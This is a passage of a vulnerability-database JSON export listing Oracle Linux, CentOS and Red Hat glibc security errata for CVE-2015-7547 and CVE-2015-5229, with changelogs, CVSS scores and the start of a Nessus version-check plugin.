"unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-106.0.1.4]\n- Remove strstr and strcasestr implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-106.4]\n- Revert problematic libresolv change, not needed for the\n CVE-2015-7547 fix (#1296030).\n[2.17-106.3]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296030).\n- Fix madvise performance issues (#1298930).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1298956).\n[2.17-106.2]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1296453).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0176", "href": "http://linux.oracle.com/errata/ELSA-2016-0176.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-106.0.1.4]\n- Remove strstr and strcasestr implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-106.4]\n- Revert problematic libresolv change, not needed for the\n CVE-2015-7547 fix (#1296030).\n[2.17-106.3]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296030).\n- Fix madvise performance issues (#1298930).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1298956).\n[2.17-106.2]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1296453).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-3515", "href": "http://linux.oracle.com/errata/ELSA-2016-3515.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3075", "CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-157]\n- Rebuild with updated binutils (#1268008)\n[2.17-156]\n- malloc arena free free list management fix (#1276753)\n[2.17-155]\n- Basic validity check for locale-archive.tmpl (#1350733)\n[2.17-153]\n- Add Intel AVX-512 optimized routines (#1298526).\n[2.17-151]\n- Improve malloc peformance in low-memory situations (#1255822).\n[2.17-150]\n- Improve performance on Intel Knights Landing/Silvermont (#1292018).\n[2.17-149]\n- Improve performance on Intel Purley (#1335286).\n[2.17-148]\n- Support upstream build infrastrucutre changes (#1256317).\n[2.17-147]\n- CVE-2016-3075: Stack overflow in nss_dns_getnetbyname_r (#1321993)\n[2.17-146]\n- s390: Restore signal mask on setcontext/swapcontext (#1249114).\n- s390: Fix backtrace in the presence of makecontext (#1249115).\n[2.17-145]\n- 
Fix times() handling of EFAULT when buf is NULL (#1308728).\n[2.17-144]\n- Fix sem_post/sem_wait race causing sem_post to return EINVAL (#1027348).\n[2.17-143]\n- Support installing only those locales specified by the RPM macro\n %_install_langs (#1296297).\n[2.17-142]\n- Fix Linux kernel UAPI header synchronization for IPv6 (#1268050).\n[2.17-141]\n- Update BIG5-HKSCS charmap to HKSCS-2008 (#1211823)\n[2.17-140]\n- Remove printf from signal handler in tst-longjump_chk2 (#1346397)\n[2.17-139]\n- Improve libm performance AArch64 (#1302086)\n[2.17-138]\n- Search locale archive again after alias expansion (#971416)\n[2.17-137]\n- Revert IPv6 name server management changes (#1305132)\n[2.17-136]\n- aarch64: Fix bits/stat.h FTM guards (#1221046)\n[2.17-135]\n- aarch64: Fix various minor ABI incompatibilities (#1335925)\n[2.17-134]\n- aarch64: Correct definition of MINSIGSTKSZ/SIGSTKSZ (#1335629)\n[2.17-133]\n- Require libselinux for nscd in non-bootstrap configuration (#1255847).\n[2.17-132]\n- Fix a number of long-standing issues in the TZ parser (#1234449).\n[2.17-131]\n- Remove PER_THREAD preprocessor macro from malloc\n- Use final upstream patch for arena free list fix (#1276753)\n[2.17-130]\n- Prevent the compiler from clobbering floating point and vector\n registers in S390 symbol resolution functions (#1324427).\n- Improve posix_fallocate behavior with NFS file descriptors (#1140250).\n[2.17-129]\n- Remove a race condition from tst-mqueue5.c test to prevent spurious\n failures (#1064063).\n[2.17-128]\n- Prevent a deadlock in gethostbyname_r (#1288613).\n[2.17-127]\n- Use test-skeleton.c in tests (#1298354).\n[2.17-126]\n- Fix inconsistent passwd compensation in nss/bug17079.c (#1293433).\n[2.17-125]\n- Backport tst-getpw enhancement to limit the time the test takes up\n (#1298349).\n[2.17-124]\n- Log system information during build (#1307028).\n[2.17-123]\n- Avoid appending duplicate shift sequences in iconv (#1293916).\n[2.17-122]\n- Reorganize POWER7 and POWER8 
support (#1213267).\n - Only build POWER7 runtime for ppc64p7.\n - Only build POWER8 runtime for ppc64le.\n - Configure with --with-cpu=power8 for ppc64le.\n - Configure with --with-cpu=power8 for ppc.\n - Configure with --with-cpu=power7 for ppc64 default runtime.\n[2.17-121]\n- Build require gcc-c++ for the C++ tests.\n- Add --with/--without controls for building glibc (#1255847)\n - Support --without testsuite option to disable testing after build.\n - Support --without benchtests option to disable microbenchmarks\n (placeholder for upstream compatibility only)\n - Update --with bootstrap to disable valgrind, documentation,\n selinux, and nss-crypt during bootstrap.\n - Support --without werror to disable building with -Werror.\n - Support --without docs to disable build requirement on texinfo.\n - Support --with valgrind to enable testing with valgrind.\n[2.17-120]\n- Make minor compatibility adjustments in headers (#1268050).\n[2.17-119]\n- Avoid aliasing issue in tst-rec-dlopen (#1292224)\n[2.17-118]\n- Suppress expected backtrace in tst-malloc-backtrace (#1276631).\n[2.17-117]\n- Avoid ld.so crash when audit modules provide path (#1211100)\n[2.17-116]\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n[2.17-115]\n- Configure --with-cpu=power8 on powerpc64 to generate POWER8\n instructions for POWER8 runtime (#1183088, #1213267).\n[2.17-114]\n- Add enhanced and optimized support for IBM z13 systems (#1268008).\n[2.17-113]\n- Prevent the malloc arena free list form turning cyclic (#1276753).\n[2.17-112]\n- Backported POWER8 optimizations for math and string functions (#1240351).\n[2.17-111]\n- Fix NULL pointer dereference in stub resolver with unconnectable name\n server addresses (#1320596).\n[2.17-110]\n- Fix memory leak in ftell for wide-oriented streams (#1310530).\n[2.17-109]\n- Avoid race condition in _int_free involving fastbins (#1305406).\n[2.17-108]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296031).\n- Fix 
madvise performance issues (#1284959).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n- Update malloc testing for 32-bit POWER (#1293976).\n[2.17-107]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1293976).", "edition": 4, "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-3638", "href": "http://linux.oracle.com/errata/ELSA-2016-3638.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3075", "CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-157]\n- Rebuild with updated binutils (#1268008)\n[2.17-156]\n- malloc arena free free list management fix (#1276753)\n[2.17-155]\n- Basic validity check for locale-archive.tmpl (#1350733)\n[2.17-153]\n- Add Intel AVX-512 optimized routines (#1298526).\n[2.17-151]\n- Improve malloc peformance in low-memory situations (#1255822).\n[2.17-150]\n- Improve performance on Intel Knights Landing/Silvermont (#1292018).\n[2.17-149]\n- Improve performance on Intel Purley (#1335286).\n[2.17-148]\n- Support upstream build infrastrucutre changes (#1256317).\n[2.17-147]\n- CVE-2016-3075: Stack overflow in nss_dns_getnetbyname_r (#1321993)\n[2.17-146]\n- s390: Restore signal mask on setcontext/swapcontext (#1249114).\n- s390: Fix backtrace in the presence of makecontext (#1249115).\n[2.17-145]\n- Fix times() handling of EFAULT when buf is NULL (#1308728).\n[2.17-144]\n- Fix sem_post/sem_wait race causing sem_post to return EINVAL (#1027348).\n[2.17-143]\n- Support installing only those locales specified by the RPM macro\n %_install_langs (#1296297).\n[2.17-142]\n- Fix Linux kernel UAPI header synchronization for IPv6 (#1268050).\n[2.17-141]\n- Update BIG5-HKSCS charmap to HKSCS-2008 (#1211823)\n[2.17-140]\n- Remove printf from signal handler in tst-longjump_chk2 (#1346397)\n[2.17-139]\n- Improve libm 
performance AArch64 (#1302086)\n[2.17-138]\n- Search locale archive again after alias expansion (#971416)\n[2.17-137]\n- Revert IPv6 name server management changes (#1305132)\n[2.17-136]\n- aarch64: Fix bits/stat.h FTM guards (#1221046)\n[2.17-135]\n- aarch64: Fix various minor ABI incompatibilities (#1335925)\n[2.17-134]\n- aarch64: Correct definition of MINSIGSTKSZ/SIGSTKSZ (#1335629)\n[2.17-133]\n- Require libselinux for nscd in non-bootstrap configuration (#1255847).\n[2.17-132]\n- Fix a number of long-standing issues in the TZ parser (#1234449).\n[2.17-131]\n- Remove PER_THREAD preprocessor macro from malloc\n- Use final upstream patch for arena free list fix (#1276753)\n[2.17-130]\n- Prevent the compiler from clobbering floating point and vector\n registers in S390 symbol resolution functions (#1324427).\n- Improve posix_fallocate behavior with NFS file descriptors (#1140250).\n[2.17-129]\n- Remove a race condition from tst-mqueue5.c test to prevent spurious\n failures (#1064063).\n[2.17-128]\n- Prevent a deadlock in gethostbyname_r (#1288613).\n[2.17-127]\n- Use test-skeleton.c in tests (#1298354).\n[2.17-126]\n- Fix inconsistent passwd compensation in nss/bug17079.c (#1293433).\n[2.17-125]\n- Backport tst-getpw enhancement to limit the time the test takes up\n (#1298349).\n[2.17-124]\n- Log system information during build (#1307028).\n[2.17-123]\n- Avoid appending duplicate shift sequences in iconv (#1293916).\n[2.17-122]\n- Reorganize POWER7 and POWER8 support (#1213267).\n - Only build POWER7 runtime for ppc64p7.\n - Only build POWER8 runtime for ppc64le.\n - Configure with --with-cpu=power8 for ppc64le.\n - Configure with --with-cpu=power8 for ppc.\n - Configure with --with-cpu=power7 for ppc64 default runtime.\n[2.17-121]\n- Build require gcc-c++ for the C++ tests.\n- Add --with/--without controls for building glibc (#1255847)\n - Support --without testsuite option to disable testing after build.\n - Support --without benchtests option to disable 
microbenchmarks\n (placeholder for upstream compatibility only)\n - Update --with bootstrap to disable valgrind, documentation,\n selinux, and nss-crypt during bootstrap.\n - Support --without werror to disable building with -Werror.\n - Support --without docs to disable build requirement on texinfo.\n - Support --with valgrind to enable testing with valgrind.\n[2.17-120]\n- Make minor compatibility adjustments in headers (#1268050).\n[2.17-119]\n- Avoid aliasing issue in tst-rec-dlopen (#1292224)\n[2.17-118]\n- Suppress expected backtrace in tst-malloc-backtrace (#1276631).\n[2.17-117]\n- Avoid ld.so crash when audit modules provide path (#1211100)\n[2.17-116]\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n[2.17-115]\n- Configure --with-cpu=power8 on powerpc64 to generate POWER8\n instructions for POWER8 runtime (#1183088, #1213267).\n[2.17-114]\n- Add enhanced and optimized support for IBM z13 systems (#1268008).\n[2.17-113]\n- Prevent the malloc arena free list form turning cyclic (#1276753).\n[2.17-112]\n- Backported POWER8 optimizations for math and string functions (#1240351).\n[2.17-111]\n- Fix NULL pointer dereference in stub resolver with unconnectable name\n server addresses (#1320596).\n[2.17-110]\n- Fix memory leak in ftell for wide-oriented streams (#1310530).\n[2.17-109]\n- Avoid race condition in _int_free involving fastbins (#1305406).\n[2.17-108]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296031).\n- Fix madvise performance issues (#1284959).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n- Update malloc testing for 32-bit POWER (#1293976).\n[2.17-107]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1293976).", "edition": 4, "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-2573", "href": "http://linux.oracle.com/errata/ELSA-2016-2573.html", "title": "glibc security, bug fix, and enhancement update", "type": "oraclelinux", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "[2.12-1.166.7]\n- Update fix for CVE-2015-7547 (#1296028).\n[2.12-1.166.6]\n- Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n[2.12-1.166.5]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296028).\n[2.12-1.166.4]\n- Support loading more libraries with static TLS (#1291270).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0175", "href": "http://linux.oracle.com/errata/ELSA-2016-0175.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "[2.12-1.166.7]\n- Update fix for CVE-2015-7547 (#1296028).\n[2.12-1.166.6]\n- Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n[2.12-1.166.5]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296028).\n[2.12-1.166.4]\n- Support loading more libraries with static TLS (#1291270).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-3516", "href": "http://linux.oracle.com/errata/ELSA-2016-3516.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:50", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0176\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX \nthread libraries (libpthread), standard math libraries (libm), and the \nname service cache daemon (nscd) used by multiple programs on the \nsystem. 
Without these libraries, the Linux system cannot function \ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n* The existing implementation of the \"free\" function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of \"madvise\" system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the \"mallopt\" function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. 
(BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error \"monstartup: out of memory\".\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-February/033710.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0176.html", "edition": 3, "modified": "2016-02-17T01:37:20", "published": "2016-02-17T01:37:20", "href": "http://lists.centos.org/pipermail/centos-announce/2016-February/033710.html", "id": "CESA-2016:0176", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:33", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0175\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n* The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with \"dlopen: cannot load any more object with static TLS\"\nshould now start up correctly. (BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. 
(BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-February/033706.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0175.html", "edition": 3, "modified": "2016-02-17T00:39:19", "published": "2016-02-17T00:39:19", "href": "http://lists.centos.org/pipermail/centos-announce/2016-February/033706.html", "id": "CESA-2016:0175", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX \nthread libraries (libpthread), standard math libraries (libm), and the \nname service cache daemon (nscd) used by multiple programs on the \nsystem. Without these libraries, the Linux system cannot function \ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. 
Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n* The existing implementation of the \"free\" function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of \"madvise\" system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the \"mallopt\" function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error \"monstartup: out of memory\".\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.", "modified": "2018-04-12T03:33:28", "published": "2016-02-16T20:05:53", "id": "RHSA-2016:0176", "href": "https://access.redhat.com/errata/RHSA-2016:0176", "type": "redhat", "title": "(RHSA-2016:0176) Critical: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2016-09-04T02:18:39", "published": "2016-02-16T05:00:00", "id": "RHSA-2016:0225", "href": "https://access.redhat.com/errata/RHSA-2016:0225", "type": "redhat", "title": "(RHSA-2016:0225) Critical: glibc security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n* The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with \"dlopen: cannot load any more object with static TLS\"\nshould now start up correctly. 
(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:16", "published": "2016-02-16T05:00:00", "id": "RHSA-2016:0175", "href": "https://access.redhat.com/errata/RHSA-2016:0175", "type": "redhat", "title": "(RHSA-2016:0175) Critical: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to these updated packages.\n", "modified": "2018-06-07T08:59:30", "published": "2016-02-19T05:00:00", "id": "RHSA-2016:0277", "href": "https://access.redhat.com/errata/RHSA-2016:0277", "type": "redhat", "title": "(RHSA-2016:0277) Critical: rhev-hypervisor security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:49:08", "description": "A stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThis update also fixes the following bugs :\n\n - The existing implementation of the 'free' function\n causes all memory pools beyond the first to return freed\n memory directly to the operating system as quickly as\n possible. This can result in performance degradation\n when the rate of free calls is very high. The first\n memory pool (the main pool) does provide a method to\n rate limit the returns via M_TRIM_THRESHOLD, but this\n method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. 
The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0.\n\n - On the little-endian variant of 64-bit IBM Power Systems\n (ppc64le), a bug in the dynamic loader could cause\n applications compiled with profiling enabled to fail to\n start with the error 'monstartup: out of memory'. The\n bug has been corrected and applications compiled for\n profiling now start correctly.", "edition": 20, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Scientific Linux Security Update : glibc on SL7.x x86_64 (20160216)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20160216_GLIBC_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88798", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88798);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n 
script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL7.x x86_64 (20160216)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThis update also fixes the following bugs :\n\n - The existing implementation of the 'free' function\n causes all memory pools beyond the first to return freed\n memory directly to the operating system as quickly as\n possible. This can result in performance degradation\n when the rate of free calls is very high. The first\n memory pool (the main pool) does provide a method to\n rate limit the returns via M_TRIM_THRESHOLD, but this\n method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. 
